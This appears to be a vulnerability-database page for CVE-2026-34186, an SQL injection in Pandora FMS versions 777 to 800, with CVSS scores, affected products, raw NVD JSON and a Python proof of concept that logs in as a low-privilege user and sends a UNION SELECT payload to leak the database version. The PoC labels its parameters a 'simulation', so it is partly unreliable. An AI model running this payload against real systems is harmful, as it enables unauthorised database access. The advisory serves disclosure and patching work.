Security Vulnerability Report
中文
CVE-2026-34186 CVSS 8.8 HIGH

CVE-2026-34186

Published: 2026-04-13 16:16:27
Last Modified: 2026-04-22 14:37:56

Description

Improper Neutralization of Special Elements used in an SQL Command vulnerability allows SQL Injection via custom fields. This issue affects Pandora FMS: from 777 through 800

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:* - VULNERABLE
Pandora FMS 777
Pandora FMS 778
Pandora FMS 779
Pandora FMS 800

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Proof of Concept for CVE-2026-34186 # Target: Pandora FMS v777 - v800 TARGET_URL = "http://target-ip/pandora_console/index.php" LOGIN_URL = TARGET_URL + "?login=1" # Low privilege credentials USERNAME = "low_priv_user" PASSWORD = "password" # Initialize session s = requests.Session() # 1. Authenticate login_data = {"nick": USERNAME, "pass": PASSWORD, "login_button": "Login"} s.post(LOGIN_URL, data=login_data) # 2. Exploit SQL Injection in Custom Fields # Vulnerable parameter logic simulation # Payload to extract database version payload = "1' UNION SELECT 1,2,version(),4,5-- -" exploit_data = { "page": "operation/agentes/ver_agente", "id_agente": "1", "custom_field_id": "1", "value": payload } response = s.get(TARGET_URL, params=exploit_data) # 3. Check for vulnerability if "mysql" in response.text or "5." in response.text: print("[+] Vulnerability confirmed! Database version leaked in response.") else: print("[-] Exploit failed or target patched.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34186", "sourceIdentifier": "[email protected]", "published": "2026-04-13T16:16:27.343", "lastModified": "2026-04-22T14:37:55.947", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command vulnerability allows SQL Injection via custom fields. This issue affects Pandora FMS: from 777 through 800"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:U/V:C/RE:L/U:Amber", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NEGLIGIBLE", "Automatable": "YES", "Recovery": "USER", "valueDensity": "CONCENTRATED", "vulnerabilityResponseEffort": "LOW", "providerUrgency": "AMBER"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:artica:pandora_fms:*:*:*:*:*:*:*:*", "versionStartIncluding": "777", "versionEndExcluding": "800.1", "matchCriteriaId": "DE3FD946-C9BB-47A3-9AE7-F958869B9278"}]}]}], "references": [{"url": "https://pandorafms.com/en/security/common-vulnerabilities-and-exposures/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}